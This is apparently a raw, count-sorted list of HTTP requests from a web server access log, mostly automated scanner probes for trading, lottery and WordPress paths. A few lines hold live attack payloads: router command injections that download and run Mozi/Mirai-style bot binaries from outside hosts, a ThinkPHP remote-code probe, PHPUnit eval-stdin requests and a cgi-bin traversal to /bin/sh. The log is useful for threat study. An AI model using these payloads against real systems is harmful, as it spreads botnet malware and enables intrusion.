2 GET /api/stock/getSingleStock.do?code=002405 HTTP/1.1
2 GET /api/uploads/apimap HTTP/1.1
1 GET /api/user/dataDictionaryService/list HTTP/1.1
2 GET /api/user/get_user_group HTTP/1.1
1 GET /api/user/ismustmobile HTTP/1.1
2 GET /api/v/index/queryOfficePage?officeCode=customHomeLink HTTP/1.1
2 GET /api/v1/about HTTP/1.1
1 GET /api/v1/member/kefu HTTP/1.1
1 GET /api/wallet/redDetail HTTP/1.1
1 GET /api/web/user/getIndexData.php HTTP/1.1
1 GET /apis/api/index HTTP/1.1
1 GET /app/js/base.js HTTP/1.1
1 GET /appxz/index.html HTTP/1.1
1 GET /assets/app-manifest.json HTTP/1.1
1 GET /assets/dist/static/js/vendor_prod.js HTTP/1.1
1 GET /assets/extension/market/css/mt4.css HTTP/1.1
1 GET /assets/images/bg.jpg HTTP/1.1
1 GET /assets/js/dmshub.js HTTP/1.1
1 GET /assets/room/css/room_mobile.css HTTP/1.1
2 GET /banner.do?code=1 HTTP/1.1
1 GET /base/exchange_article/index/classid/1/id/1 HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /client/api/findConfigByKey?configKey=level_config HTTP/1.1
1 GET /client/api/findFreeTrade HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /common/template/lottery/lecai/css/style.css HTTP/1.1
1 GET /config.js HTTP/1.1
2 GET /config.php?_=3283&1922563758 HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /cscpLoginWeb/scripts/public.js HTTP/1.1
1 GET /csjs/bankCheck.js HTTP/1.1
1 GET /css/app.css HTTP/1.1
2 GET /css/dafa.css HTTP/1.1
1 GET /css/main.css HTTP/1.1
1 GET /css/nsc/reset.css HTTP/1.1
2 GET /css/skin/ymPrompt.css HTTP/1.1
1 GET /css/style.css HTTP/1.1
1 GET /data/ticker_24hr HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
2 GET /douyinpay.php?order=20210815173223834 HTTP/1.1
1 GET /elrekt.php HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /fePublicInfo/ HTTP/1.1
1 GET /files/pub_rem.js HTTP/1.1
2 GET /files/pub_reset.css HTTP/1.1
2 GET /friendGroup/list HTTP/1.1
1 GET /gaga/city.php HTTP/1.1
1 GET /getConfig/getArticle.do?code=19 HTTP/1.1
1 GET /getConfig/getArticle.do?code=1 HTTP/1.1
1 GET /getConfig/listPopFrame.do?code=1&position=index&_=1601489645097 HTTP/1.1
2 GET /getConfig/listPopFrame.do?code=14&position=index&_=1601489645097 HTTP/1.1
1 GET /getLocale HTTP/1.1
2 GET /h5/ HTTP/1.1
1 GET /h5/static/tabbar/txl.png HTTP/1.1
2 GET /h5 HTTP/1.1
1 GET /home/GetQrCodeInfo HTTP/1.1
1 GET /home/help HTTP/1.1
2 GET /home/login.jpg HTTP/1.1
1 GET /home/login/login_index.html HTTP/1.1
1 GET /home/main/login HTTP/1.1
3 GET /homes/ HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /im/App/config HTTP/1.1
1 GET /im/ HTTP/1.1
2 GET /im/h5/ HTTP/1.1
1 GET /im/in/GetUuid HTTP/1.1
1 GET /images/favicon.ico HTTP/1.1
1 GET /images/no.jpg HTTP/1.1
1 GET /images/src_images_but_dianz_s.png HTTP/1.1
2 GET /img/login.png HTTP/1.1
1 GET /img/xxing.png HTTP/1.1
2 GET /img/zllqdk.png HTTP/1.1
1 GET /index.php/Wap/Api/getBanner HTTP/1.1
1 GET /index.php/Wap/Api/getSystemNotice?id=1 HTTP/1.1
1 GET /index.php/sign HTTP/1.1
2 GET /index.php?m=api&c=app&a=getPlatformConfig HTTP/1.1
1 GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index/api/config HTTP/1.1
1 GET /index/getNews HTTP/1.1
1 GET /index/index/andiro HTTP/1.1
1 GET /index/index/js/api.js HTTP/1.1
1 GET /index/index/purchase.html HTTP/1.1
2 GET /index/login/login HTTP/1.1
2 GET /index/login/register HTTP/1.1
1 GET /index/newapi/api HTTP/1.1
1 GET /index/police/index.html?agent=1000 HTTP/1.1
1 GET /index_files/bankCheck.js HTTP/1.1
1 GET /infe/rest/fig/advertise/common.json?mobile_open=1 HTTP/1.1
1 GET /infe/rest/flash/getServerIP.json HTTP/1.1
1 GET /ipl/app/flash/publicbmw/ball/FigLeaf.js?site=member HTTP/1.1
2 GET /java_script/template_1/game.js?v=1 HTTP/1.1
2 GET /js/a.script HTTP/1.1
1 GET /js/bankCheck.js HTTP/1.1
1 GET /js/base1.js HTTP/1.1
1 GET /js/basic.js HTTP/1.1
1 GET /js/common.js HTTP/1.1
2 GET /js/dianzan.js HTTP/1.1
1 GET /js/home.js HTTP/1.1
2 GET /js/json.js HTTP/1.1
2 GET /js/post.js/ HTTP/1.1
2 GET /js/pups.js HTTP/1.1
1 GET /js/tvConfig.js HTTP/1.1
1 GET /kefu.php HTTP/1.1
1 GET /kkrps/im_group/show_members HTTP/1.1
2 GET /lanren/css/global.css HTTP/1.1
1 GET /legal/currency/set HTTP/1.1
1 GET /loan HTTP/1.1
1 GET /login.html HTTP/1.1
1 GET /login/img/nyyh/chkjs.js HTTP/1.1
1 GET /m/ HTTP/1.1
1 GET /m/allticker/1 HTTP/1.1
2 GET /m/ticker/usdtqc HTTP/1.1
2 GET /manager/js/left.js HTTP/1.1
1 GET /market/getStockBaseInfo?stockCodeInternal=2658 HTTP/1.1
1 GET /mh/phone.do HTTP/1.1
1 GET /mobile/bluev3/img/bg.png HTTP/1.1
1 GET /mobile/config.js HTTP/1.1
2 GET /mobile/css/base.css HTTP/1.1
2 GET /mobile/static/js/config.js HTTP/1.1
1 GET /mobile/v3/appSuperDownload.do HTTP/1.1
2 GET /mtja.html HTTP/1.1
1 GET /myConfig.js HTTP/1.1
1 GET /mytio/config/base HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /nyyh/game.css HTTP/1.1
1 GET /otc/ HTTP/1.1
1 GET /other/codepay/js/codepay_util.js HTTP/1.1
2 GET /pages/console/js/common.js HTTP/1.1
1 GET /portal/index/protocol.html HTTP/1.1
1 GET /proxy/games HTTP/1.1
2 GET /proxy/settings HTTP/1.1
1 GET /public/admin.php/api/index/loansList HTTP/1.1
1 GET /public/css/style.css HTTP/1.1
2 GET /public/img/cz1.png HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /public/static/css/denglu.css HTTP/1.1
2 GET /public/static/css/public.css HTTP/1.1
1 GET /public/static/home/js/moblie/login.js HTTP/1.1
1 GET /public/wap/js/basis.js HTTP/1.1
1 GET /public/web/css/add//index[.]css HTTP/1.1
1 GET /public/web/js/add/com.js HTTP/1.1
1 GET /resources/main/common.js HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /room/getRoomBangFans HTTP/1.1
1 GET /room/script/face.js HTTP/1.1
2 GET /s_api/basic/config_js?callback=__set_config HTTP/1.1
1 GET /s_api/basic/download/info HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//60[.]183[.]151[.]200:38594/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.46/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /site.js HTTP/1.1
1 GET /site/get-hq?proNo=btc&panType=1&pid=1 HTTP/1.1
1 GET /site/info HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /skin/js/common.js HTTP/1.1
1 GET /skin/main/onload.js HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /static/admincp/js/common.js HTTP/1.1
1 GET /static/common/js/common.js HTTP/1.1
1 GET /static/config.js HTTP/1.1
1 GET /static/css/index.css HTTP/1.1
1 GET /static/css/mobile.css HTTP/1.1
2 GET /static/css/public.css HTTP/1.1
1 GET /static/data/configjs.js HTTP/1.1
1 GET /static/data/gamedatas.js HTTP/1.1
2 GET /static/diff_worker.js HTTP/1.1
2 GET /static/download/style.css HTTP/1.1
2 GET /static/h5/img/icon__create-group.png HTTP/1.1
1 GET /static/home/css/common.css HTTP/1.1
1 GET /static/home/css/new_cfb.css HTTP/1.1
1 GET /static/home/js/rooms.js HTTP/1.1
1 GET /static/icon/my.png HTTP/1.1
1 GET /static/image/chicang.png HTTP/1.1
1 GET /static/images/login_bg.jpg HTTP/1.1
1 GET /static/img/bitbeb-logo.png HTTP/1.1
1 GET /static/img/notices.png HTTP/1.1
1 GET /static/index/css/iindex.css HTTP/1.1
2 GET /static/index/css/trade-history.css HTTP/1.1
2 GET /static/js/user.js HTTP/1.1
2 GET /static/local/img/userCenter/hourlyPrivilege.svg HTTP/1.1
1 GET /static/wap/css/index.css HTTP/1.1
1 GET /static/wap/css/trade-history.css HTTP/1.1
1 GET /static/wap/js/common.js HTTP/1.1
1 GET /static/wap/js/order.js HTTP/1.1
1 GET /statics/js/API.js HTTP/1.1
2 GET /stock/mzhishu HTTP/1.1
1 GET /stock/search.html?keyword=00202 HTTP/1.1
1 GET /sys/setting/app HTTP/1.1
1 GET /template/920ka/css/lsy.css HTTP/1.1
1 GET /template/920ka/js/woodyapp.js HTTP/1.1
2 GET /template/css/login.css HTTP/1.1
2 GET /template/tmp1/js/common.js HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /themes/simpleboot3/public/assets/newpc/download_pattern_right.png HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /thriveGame.css HTTP/1.1
1 GET /user/Login HTTP/1.1
2 GET /user/login.html HTTP/1.1
1 GET /user/userlist HTTP/1.1
1 GET /v1/management/tenant/getSpeedDomain HTTP/1.1
1 GET /v2/block/home/app/hot HTTP/1.1
2 GET /v2/start/config HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /verification.asp HTTP/1.1
2 GET /views/commData/commonSite.js HTTP/1.1
1 GET /views/home/home.js HTTP/1.1
2 GET /wap/trading/get_newallorder_ajax HTTP/1.1
1 GET /wap HTTP/1.1
1 GET /web/api/getBanner HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /ws/index/getTheLotteryInitList HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 GET /xy/ HTTP/1.1
1 GET /xy/image/jiantou.png HTTP/1.1
1 GET /zz/address.php?gid=651 HTTP/1.1
12 GET http[:]//azenv[.]net/ HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/app/config_new HTTP/1.1
2 POST /api/link/platform HTTP/1.1
1 POST /api/system/system/config/get HTTP/1.1
1 POST /api/user/mobilelogin HTTP/1.1
2 POST /api/v1/borrowxx.html HTTP/1.1
1 POST /biz/server/config HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
2 POST /index.php/api/other/appSetting HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /index/indexSymbol HTTP/1.1
2 POST /kkrp/site/info HTTP/1.1
1 POST /login/kefuxian.mvc HTTP/1.1
1 POST /melody/api/v1/pageconfig/list HTTP/1.1
1 POST /sys/setting/all HTTP/1.1
1 POST /v1/auth/getCaptcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /wap/banner/details HTTP/1.1
1 POST http[:]//maryblack[.]xyz/77f991dfdcc4e79f5b8da14c9bd1e283feddc6243e8a1281754da7303509ca462c614d9b72cfee1e4357f902e822f07894ae3365da692fc75356e8ffe58413411acc7e273055ba0362dca3966ee9099f3f71189cb7e3a43b8aeed5d3888ba7ef HTTP/1.1